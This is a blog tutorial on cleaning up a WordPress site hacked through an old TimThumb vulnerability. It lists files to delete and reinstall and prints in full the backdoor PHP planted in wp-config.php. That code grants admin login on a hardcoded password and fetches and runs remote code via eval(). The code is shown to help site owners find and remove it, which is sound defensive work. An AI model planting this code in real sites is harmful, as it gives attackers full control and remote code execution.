How To Clean Up The “Tim Thumb” Hack

Updated November 15th, 2017
Updated November 15th, 2017
Share this post:
Share on facebook
Share on twitter
Share on reddit
Share on linkedin
Share on pinterest
Share on pocket
Share on email
Share on print

 

What is Tim Thumb?

Tim Thumb is a php script that handles web images; it is used to resize, crop and enlarge JPGs, PNGs and GIF image formats. It was first developed and used as part of the Mimbo Pro WordPress theme, but it was so popular it ended up on most websites.

As with most new plugins or code that gain popularity so quickly, hackers took an interest as well. Hackers discovered that the code could be hacked and used to redirect traffic as well as redirect e-mails to third party sites.

The vulnerability was fixed quickly and the code was updated. But even today, not everyone is aware that they were compromised and continue to use the old script.

Luckily, there is a way to find out if you are compromised; if you are using the old version of the script. What you need to do is visit your website/blog (you may have to use a browser you normally don’t use or log out of your website). If, when trying to visit the website you’re redirected to a Google safety warning page that says something like – Warning: Something’s Not Right Here! – then you have a problem. That message can be caused by many things including a hacked “Tim Thumb” script.

There is also a Tim Thumb vulnerability checker page, that is more likely to find if you have the issue. It is a plugin you install. It scans your website for the vulnerability and it can also upgrade you to the safe Tim Thumb version. You can also do the update manually.

How To Fix The Tim Thumb Hack

You’re going to need to delete a few files from your WordPress directory:
/wp-admin/upd.php and /wp-content/upd.php need to go.

Then, you need to reinstall these files:

  • /wp-settings.php
  • /wp-includes/js/jquery/jquery.js
  • /wp-includes/js/110n.js

Last, but not least, you’ll need to open wp-config.php and delete the code that has been snuck through the Tim Thumb vulnerability. This is the what the bad code looks like:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])) {
  if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
    if ($_GET['pingnow']== 'login') {
      $user_login = 'admin';
      $user = get_userdatabylogin($user_login);
      $user_id = $user->ID;
      wp_set_current_user($user_id, $user_login);
      wp_set_auth_cookie($user_id);
      do_action('wp_login', $user_login);
    }
    if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))) {
      $ch = curl_init($_GET['file']);
      $fnm = md5(rand(0,100)).'.php';
      $fp = fopen($fnm, "w");
      curl_setopt($ch, CURLOPT_FILE, $fp);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      curl_exec($ch);
      curl_close($ch);
      fclose($fp);
      echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
      }
    if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
      $ch = curl_init($_GET['file']);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      $re = curl_exec($ch);
      curl_close($ch);
      eval($re);
      }
    }
  }

There will also be some Tim Thumb script cached files that you’ll have to remove:

  • /wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
  • /wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

All of the code must be deleted.

After you’ve deleted the malicious code, you need to install a fresh, updated Tim Thumb version, and, just to be safe, change the password for your website and your MySQL password as well. The MySQL password is the one in your wp-config.php that allows WordPress to connect to the database.

After doing all of that, you manage to clean up the Tim Thumb hack. This is a good lesson. We often assume that things are ‘safe’ and that everything will work as it should. But in reality, we can’t be sure if the plugins we install are safe from hacking or if the person who wrote the plugin has good intentions. Sometimes it’s wise to wait a while when new plugins come out, so that there is time to see if it is a target before you install it. Sometimes there’s no time for that, so make sure you back up your website and database when you install new plugins!

Share this post:
Share on facebook
Share on twitter
Share on reddit
Share on linkedin
Share on pinterest
Share on pocket
Share on email
Share on print
Share on facebook
Share on twitter
Share on linkedin
Share on pinterest
Share on email

Responses

Your email address will not be published.

WPLearningLab

Warning: Use of undefined constant WPBF_CHILD_THEME_URI - assumed 'WPBF_CHILD_THEME_URI' (this will throw an Error in a future version of PHP) in /home/customer/www/wplearninglab.com/public_html/wp-content/themes/buddyboss-theme-child/functions.php on line 108

Warning: Use of undefined constant WPBF_CHILD_VERSION - assumed 'WPBF_CHILD_VERSION' (this will throw an Error in a future version of PHP) in /home/customer/www/wplearninglab.com/public_html/wp-content/themes/buddyboss-theme-child/functions.php on line 108